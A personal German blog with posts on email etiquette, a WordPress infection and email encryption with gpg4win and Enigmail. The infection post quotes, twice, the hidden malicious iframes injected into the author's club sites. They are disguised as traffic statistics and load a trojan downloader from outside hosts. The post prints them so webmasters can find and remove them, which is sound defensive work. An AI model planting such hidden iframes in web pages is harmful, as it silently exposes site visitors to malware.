Liebe Freunde,
habe mein Blog zur Zeit ein wenig abgespeckt. Die Luft ist im Moment ein wenig raus, die Interessen haben sich verlagert. Ein paar Artikel zu den Themen Email und Internet, die ich wichtig finde, hab ich noch drin gelassen. Außerdem lasse ich mein Blog noch online, damit ihr mir über das Kontaktformular ne Mail senden könnt, falls ihr keiner meiner zahlreichen Emailadressen nicht kennt. LG, Euer Schorsch!
Die Email ist heute das alltägliche Kommunikationsmittel. Sie ersetzt zunehmend den Brief. Während man sich bei letzterem meistens an ein Mindestmaß an Form hält, wird die Email häufig stilmäßig sehr stiefmütterlich behandelt. Den Rest des Beitrags lesen »
In der Blogstatistik stelle ich immer wieder fest, dass Leute nach Tipps zum Umgang mit Emails suchen. Wie schützt man sich gegen die Flut von unerwünschten Emails, zum Teil sogar mit gefährlichen Schadprogrammen (Viren) im Gepäck? Zwar gibt es hierzu eine Fülle von Informationen im Netz. Jedoch nur wenige, die für Privatanwender eine klare Übersicht zum Thema bieten. Ich möchte hier meine Erfahrungen mitteilen.
Mittlerweile ist es schon beim letzten Zeitgenossen angekommen, wie bequem es ist, Neuigkeiten per Email zu senden. Ich bekomme solche Rundschreiben von Vereinen, Musikerkollegen und Privatleuten. In absehbarer Zeit gibt es niemanden mehr, der nicht per Email erreichbar ist. Dann wird das elektronische Rundschreiben in jedem Verein Standart sein. Viele Versender solcher Nachrichten sind dabei häufig sehr gedankenlos im Umgang mit den Daten ihrer Empfänger.
Trojaner-Warnungen können Nerven, Zeit und Kopfschmerzen kosten. Auf den von mir verwalteten WordPress-Blogs http://fv-bakum.de und http://feuerwehr-bakum.de schlich sich böser Code ein. Beide laufen auf einem auf einem 1&1-Webspace installierten WordPress-System. Besucher sprachen mich immer wieder darauf an, dass ein Trojaner auf meinen Seiten wäre.
Es handelte sich um den Trojaner “TR/Dldr.HTML.Agent.IS”. Falls Ihr Antivirenprogramm beim Besuch einer Internetseite alarmiert hat, benachrichtigen Sie bitte den Webmaster mit einem Hinweis auf diese Seite. Wie Sie als Webmaster diesen Trojaner aus Ihrem Blog entfernen können, erfahren Sie unten am Ende des Beitrags.
Ich konnte mir dies gar nicht denken, aber weil sich diese Warnungen häuften, beschloss ich der Sache auf den Grund zu gehen. Da ich aus Sicherheitsgründen immer mit dem Firefox-Browser von einem eingeschränkten Nutzerkonto aus ins Internet gehe, hat mich mein Antivirenprogramm Antivir nie vor einem gefährlichen Trojaner gewarnt. Anscheinend mag der den Firefox nicht.
Ich erkundigte zunächst mich im WordPress-Deutschland-Forum. Dort waren die Reaktionen erst ratlos. Ein Trojaner habe man nicht auf meinen Seiten gefunden. Einer fand aber dann doch eine solch gefährliche Warnung. Anscheinend surfen die Spezis in diesem Forum wohl auch nicht mit dem Internet Explorer.
Nun wechselte ich in das Administrationskonto und rief mit dem Internet Explorer 7 beide Seiten auf. Leider ist dies ja immer noch der übliche und ziemliche unsichere Weg des Normalnutzers von Computern in das Internet. Und sofort warnte mich Antivir: Das “Trojanische Pferd TR/Dldr.HTML.Agent.IS” verlangte den Zugriff auf meinen Rechner. Zur großen Darstellung der Warnung …
Ich hatte bereits Stunden verwandt, um alle Dateien meiner WordPress-Installationen (mit den dazu notwendigen Datensicherungen) auszutauschen. Jedoch war dies erfolglos. Der Trojaner wollte nicht weichen. Nach einigen Rückfragen im WordPressforum stellte sich heraus: Ein böser Code wurde einfach mit einem Verweis auf eine Script-Datei in meinen Beiträgen eingebettet, mit der anscheinend dieser Trojaner in fremde Rechner geschleust wird:
<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> oder
<!– Traffic Statistics –> <iframe src=”http://61.155.8.157/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>
Wenn man diesen Quellcode liest glaubt man, es handle sich um eine Statistikfunktion von WordPress. Doch da irrt man gewaltig. Die Domains wp-stats-php.info bzw. http://61.155.8.157 sind in China registriert. Beim Aufruf eines derart infizierten Beitrags wundert man sich, dass die Ladezeit erheblich verlängert wird. In der Statuszeile des Browsers erscheint “wp-stats …info”. Da dies so ähnlich aussieht wie eine interne WordPress-Funktion, schöpft man nicht so schnell Verdacht, dass in diesem Moment ein Trojaner von einer chinesischen Quelle aus dem Rechner eingeschleust wird.
Ein einfacher Blick in den Seitenquelltext eines Beitrags reicht aus, diesen schädlichen Code in den Beiträgen sofort zu entdecken. Selbstverständlich habe ich die “infizierten” Beiträge sofort entfernt. Bei einem Update der WordPress-Installation werden die Beiträge nicht geändert. Deshalb konnte der schädliche Code beim Auswechseln der WordPress-Dateien auch nicht beseitigt werden sondern nur, indem man die betroffenen Beiträge entfernt.
Der Code versteckt sich im HTML-Code eines Beitrags, welcher nach Erzeugung durch das WordPress-Script in der mysql-Datenbank abgelegt und gespeichert wird. Wird der Beitrag aus der Datenbank abgefragt, wird auch wieder der in der Datenbank abgelegte böswillige und für den normalen Nutzer nicht sichtbare Code im Beitrag hinzugefügt. Der Code versteckt sich also in der Datenbank und nicht direkt in den Script-Dateien von WordPress.
Das gleiche Problem ist übrigens nicht nur bei WordPress-Blogs sondern auch bei Homepages, die mit Joomla verwaltet werden, aufgetreten.
Nur was soll man jetzt noch machen? Wo ist die Sicherheitslücke? Wie kommt dieser böse Quelltext in mein Blog? Wie kann man verhindern, das dieser Code sich so einfach in ein WordPress-Blog schleichen kann? Ich habe alle Dateien der Installation getauscht, meinen Rechner mit dem Antivirenprogramm Antivir gescannt. Nun weiß ich auch nicht, was ich sonst noch so tun kann.
Um den “Trojaner” aus Ihrem Blog zu löschen, rufen Sie mit Ihrem Browser die Seiten mit Ihren Beiträgen auf. Bei den WordPress-Blogs sind dies standartmäßig die Startseite und bei vielen Beiträgen die weiter gelinkten Fortsetzungsseiten. Nun müssen Sie sich den Quelltext dieser Seite ansehen. Klicken Sie dazu mit der rechten Maustaste auf die Seite und wählen Sie “Quellcode anzeigen” aus. Der Quellcode wird angezeigt. Schauen Sie nach, in welchem Beitrag der Quellcode
<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe>” oder ähnlich, z.B.:
<!– Traffic Statistics –> <iframe src=”http://61.155.8.157/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>
vorhanden ist. Melden Sie sich jetzt in Ihren Blog an und löschen Sie den betreffenden Beitrag aus Ihrem Blog. Alternativ können Sie auch nur den böswilligen Code aus dem HTML-Code des befallenen Beitrag entfernen, wenn sie den Beitrag nicht löschen möchten. Damit haben Sie den Code gelöscht, über den der Trojaner in Ihr Blog eindringt. Für die Folgen bei Anwendung dieses Hinweises übernimmt der Verfasser keinerlei Haftung.
Update 04.04.2009: Die Sicherheitslücke scheint nicht im WordPress-Skript sondern im FTP:-Protokoll zu liegen. Mit FTP lädt man die Skript-Dateien auf den Server. Anscheinend ist es für die Hacker möglich, den Zugang zu einem Server zu knacken, wenn er das Zugangsasswort herausfindet. Dann kann jede Datei auf dem Webserver manipuliert werden. Dies berichtet Florian Flegel in seinem Beitrag Wer braucht ein AntiVirus-Plugin für WordPress?
Diese Erklärung ist sehr plausibel, zugleich ist dies der Gau des Internets. Denn dann ist jede Website, die auf einem lokalen Webserver gespeichert wird, potentiell manipulierbar. Ich musste diese unangenehme Erfahrung auch bei HTML-Homepages machen. In den Seiten wurde einfach schädlicher Code eingefügt. Es ist mir immer nach schleierhaft, wie die Angreifer die FTP-Zugangspasswörter, die aus reinen Buchstaben/Zahlenkombinationen bestanden, “errieten”. Flegels Rat zum Schließen dieser Lücke sind “sichere FTP-Passwörter”.
Demnach müssten die drei Passwörter des FTP- Zugangs, der MyQsl-Datenbank und des Zugangs zu WordPress “sicher” geändert werden, um das System “virendicht zu machen”. Webmaster aller Länder, wechselt Eure Passwörter! Ist dies wirklich der Schlüssel zum Erfolg?
Immer mehr Leute, wie zum Beispiel auch ich, verschicken ihre “Briefe” elektronisch per Email. Und gehen damit oft ziemlich sorglos um. Denn unterwegs passiert eine Email viele Rechner, über die Emailadressen und Informationen gesammelt werden können.
Das Bundesamt für Sicherheit in der Informationstechnik (BSI) empfiehlt daher, Emails zu verschlüsseln. Hier kann die Computertechnik, deren Fluch es ist, alle Informationen frei sichtbar weltweit zu verteilen, dazu genützt werden, Vertrauliches zu chiffrieren. Neugierige, wie zum Beispiel auch der Staat und Kriminelle, haben es dann wesentlich schwerer, andere auszuschmüffeln.
Da mich dies interessierte, habe ich zwei Möglichkeiten zur Verschlüsselung von Emails auf Windowsrechnern ausprobiert. Das BSI hat mit gpg4win ein kostenloses Programmpaket zur Verschlüsselung von Emails und Dateien zusammenstellen lassen. Die zweite Alternative bietet das Emailprogramm Thunderbird mit dem Zusatzmodul (ADD-ON) Enigmail.
In beiden Fällen wird die OpenPGP-Verschlüsselung im Hintergrund integriert. Um Emails zu verschlüssen und entschlüsseln benötigt man ein Schlüsselpaar, welches aus einem privaten und öffentlichen Schlüssel besteht. Damit der Empfänger die verschlüsselten Emails dekodieren kann, benötigt er den öffentlichen Schlüssel, die er als Datei vom Versender erhalten haben muss. Ansonsten erscheint die Email als unlesbarer Zeichenkauderwelsch.
Die Installation von gpg4win ist sehr einfach. Nachdem das Programm heruntergeladen wurde, können die Programmmodule mit einer einfachen Installationsroutine auf den Rechner gebracht werden. Der Vorteil von gpg4win ist, dass nicht nur Emails sondern alle Dateien auf dem Rechner verschlüsselt werden können. Man kann also zum Beispiel auch ein Word-Dokument verschlüsseln und per Email versenden. Mit gpg4win kann der Empfänger, vorausgesetzt, er hat den Schlüssel, die Worddatei in Klarschrift zurückverwandeln. Zum Verschlüsseln kopiert man die Daten der jeweiligen Anwendung in die Zwischenablage, läßt sie mit OpenPGP verschlüsseln und kopiert sie dann codiert wieder in die Datei. Dies ist allerdings ein wenig umständlich.
Will man nur Emails verschlüsseln, bietet der ebenfalls kostenlose Thunderbird die komfortablere Variante. Will man eine Email verschlüsselt versenden, braucht man nur auf einen Button “OpenPGP” zu klicken und schon erledigt das Programm alles automatisch. Erhält man eine verschlüsselte Email, entschlüsselt der Thunderbird die Email automatisch, sofern man den richtigen Schlüssel hat. Die Installation der Verschlüsselung beim Thunderbird ist allerdings ein wenig komplizierter. Neben dem ADD-ON Enigmail muss auch noch die Verschlüsselungssoftware GnuPG installiert sein. Ein weiterer Nachteil ist, das nur Email, nicht aber angehängte Dateien verschlüsselt werden können.
Facit: Für alle, die häufig sensible Dateien per Email versenden wollen, gpg4win die optimale Lösung zur Verschlüsselung. Für alle Anwender, die nur ihre Email vor unerwünschtem Einblick schützen wollen, bietet der Thunderbird mit dem Add-On Enigmail die komfortabeler und einfacher zu bedienende Variante. Eigentlich sollte jede Email verschlüsselt sein. Ob sich dies durchsetzt ist fraglich. Denn dazu müssen sowohl der Empfänger als auch der Emailsender bereit sein und die dafür notwendigen Programme installiert haben. Meinen Freunden und Bekannten sende ich auf Wunsch gerne den öffentlichen Schlüssel zu meinen Mailadressen zu!
Linktipps:
Installation von gpg4win …
Installation von Enigmail beim Thunderbird …
Direktlink zum Download von GnuPG für Windows XP
Über den Webhoster 1&1 verwalte ich mittlerweile einige Websites für Bakumer Vereine und andere Freunde. Wenn man sich auf die Administrations – Homepage einwählt, werden dort einem eine ständig wachsende Zahl von nützlichen oder auch überflüssigen Den Rest des Beitrags lesen »
